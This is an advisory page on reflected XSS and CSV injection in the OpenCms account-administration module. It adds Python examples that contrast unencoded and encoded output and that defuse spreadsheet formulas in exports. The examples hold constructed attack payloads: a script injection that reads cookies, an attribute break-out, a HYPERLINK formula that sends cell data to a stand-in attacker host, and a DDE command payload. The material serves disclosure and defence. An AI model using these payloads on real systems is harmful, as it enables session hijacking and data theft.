org.opencms:org.opencms.workplace.tools.accounts@10.5.3 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.opencms:org.opencms.workplace.tools.accounts package. This does not include vulnerabilities belonging to this package’s dependencies.

Cross-site Scripting (XSS), severity: M (medium)

org.opencms:org.opencms.workplace.tools.accounts is the account-administration module of OpenCms, an enterprise-ready, easy-to-use website content management system based on Java and XML technology.

Affected versions of this package are vulnerable to reflected Cross-site Scripting (XSS). The user_new.jsp page under /resources/system/workplace/admin/accounts/ echoes user-supplied input back into the HTML response without any output encoding, so an attacker who gets a workplace user to submit a crafted request can have arbitrary JavaScript executed in that user's browser, in the context of their OpenCms session.

How to fix Cross-site Scripting (XSS)?

Upgrade org.opencms:org.opencms.workplace.tools.accounts to version 11.0.0 or higher.

Vulnerable versions: [6.2.0,11.0.0) (every release from 6.2.0 up to, but not including, 11.0.0)
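The reflection pattern described above, as an added example that is not code from OpenCms or from this advisory: a hypothetical server-side render of a "new user" form that writes the submitted login back into the page, first without encoding (the defect class reported here) and then with context-appropriate HTML encoding. The form markup, the function names and the two payloads are constructed for illustration; the only library call is Python's html.escape.

```python
import html

# Constructed payloads (not from the advisory): a classic script injection and an
# attribute break-out that needs no <script> tag at all.
PAYLOAD_SCRIPT = '"><script>alert(document.cookie)</script>'
PAYLOAD_ATTRIBUTE = '" autofocus onfocus="alert(1)'


def render_new_user_form_vulnerable(login: str) -> str:
    """Hypothetical reflection of the submitted login with no output encoding.

    Same pattern the advisory describes: user input is concatenated straight
    into HTML, here both in element text and inside a quoted attribute value.
    """
    return (
        '<form method="post" action="user_new.jsp">'
        '<p class="error">User "' + login + '" could not be created.</p>'
        '<input type="text" name="login" value="' + login + '">'
        "</form>"
    )


def render_new_user_form_safe(login: str) -> str:
    """Same page with output encoding applied at the sink.

    html.escape(quote=True) turns < > & " ' into entities, which is the right
    encoding for HTML text content and for double-quoted attribute values.
    """
    enc = html.escape(login, quote=True)
    return (
        '<form method="post" action="user_new.jsp">'
        '<p class="error">User "' + enc + '" could not be created.</p>'
        '<input type="text" name="login" value="' + enc + '">'
        "</form>"
    )


def reflects_unencoded(page: str, payload: str) -> bool:
    """True if the payload survives verbatim in the response: the check a tester
    runs against a suspected reflected-XSS sink."""
    return payload in page


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_ATTRIBUTE):
        print("vulnerable reflects payload:", reflects_unencoded(render_new_user_form_vulnerable(payload), payload))
        print("hardened reflects payload:  ", reflects_unencoded(render_new_user_form_safe(payload), payload))
```

The attribute payload is the one to keep in mind when reviewing a JSP: a filter that only strips `<script>` tags leaves it working, whereas encoding the double quote closes the hole in both contexts at once.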
CSV Injection, severity: M (medium)

Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when a website embeds untrusted input in a CSV file. When a spreadsheet program opens the CSV, any cell beginning with '=' (and likewise '+', '-', '@', a tab or a carriage return) is interpreted as a formula rather than as text, which can be used to leak cell contents to an attacker-controlled host or, where the spreadsheet still allows it, to launch external commands. The user_new.jsp file under /resources/system/workplace/admin/accounts/ allows untrusted input to be saved as such formulas, which can later be exported as part of account-management administration views and opened by an administrator.

How to fix CSV Injection?

Upgrade org.opencms:org.opencms.workplace.tools.accounts to version 11.0.0 or higher.

Vulnerable versions: [6.2.0,11.0.0) (every release from 6.2.0 up to, but not including, 11.0.0)
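An added example of the export side of this issue, not code from OpenCms or from this advisory: a hypothetical account export that writes stored display names to CSV as-is (the vulnerable behaviour), the same export with formula triggers defused before writing, and a scanner that flags formula-like cells in an export produced by an unpatched instance. The sample rows, the column layout and the attacker hostname are constructed for illustration; the trigger list follows the OWASP CSV Injection guidance.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets treat as the
# start of a formula, plus tab and carriage return, which can smuggle a trigger
# past a check that only looks at the first byte (OWASP "CSV Injection").
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows (not real OpenCms data). mallory's display name builds
# a hyperlink that leaks cell A1 to an attacker host when clicked; trent's is
# the classic DDE pattern, hidden behind leading spaces.
SAMPLE_USERS = [
    {"login": "alice", "display_name": "Alice Example", "email": "alice@example.test"},
    {"login": "mallory", "display_name": '=HYPERLINK("http://attacker.invalid/?"&A1,"open")', "email": "mallory@example.test"},
    {"login": "trent", "display_name": "  +cmd|' /C calc'!A0", "email": "trent@example.test"},
]


def neutralize_cell(value) -> str:
    """Defuse a value that a spreadsheet would otherwise evaluate.

    A leading apostrophe makes spreadsheet applications read the cell as
    literal text. Leading spaces are ignored for the check so "  =1+1" is caught.
    Side effect to be aware of: legitimate values such as "-5" or "+49 30 ..."
    are prefixed too; strip the apostrophe on re-import if that matters.
    """
    text = "" if value is None else str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_users_csv(users, defuse=True) -> str:
    """Render an account export as CSV text.

    defuse=False reproduces the vulnerable behaviour (values written as stored);
    defuse=True is the hardened export. QUOTE_ALL also doubles embedded quotes,
    so a value cannot break out of its own cell.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    columns = ("login", "display_name", "email")
    writer.writerow(columns)
    for user in users:
        row = [user[c] for c in columns]
        if defuse:
            row = [neutralize_cell(v) for v in row]
        writer.writerow(row)
    return buf.getvalue()


def first_dangerous_cell(csv_text: str):
    """Scan an export and return (row, column, value) of the first cell that a
    spreadsheet would evaluate as a formula, or None if the file is clean."""
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip(" ").startswith(FORMULA_TRIGGERS):
                return (r, c, cell)
    return None


if __name__ == "__main__":
    print("unpatched export flags:", first_dangerous_cell(export_users_csv(SAMPLE_USERS, defuse=False)))
    print("hardened export flags: ", first_dangerous_cell(export_users_csv(SAMPLE_USERS)))
```

The scanner is the useful half for incident response: run it over exports taken from an instance in the vulnerable range to find accounts whose stored fields already carry a formula, since upgrading fixes the export but does not rewrite data that was saved earlier.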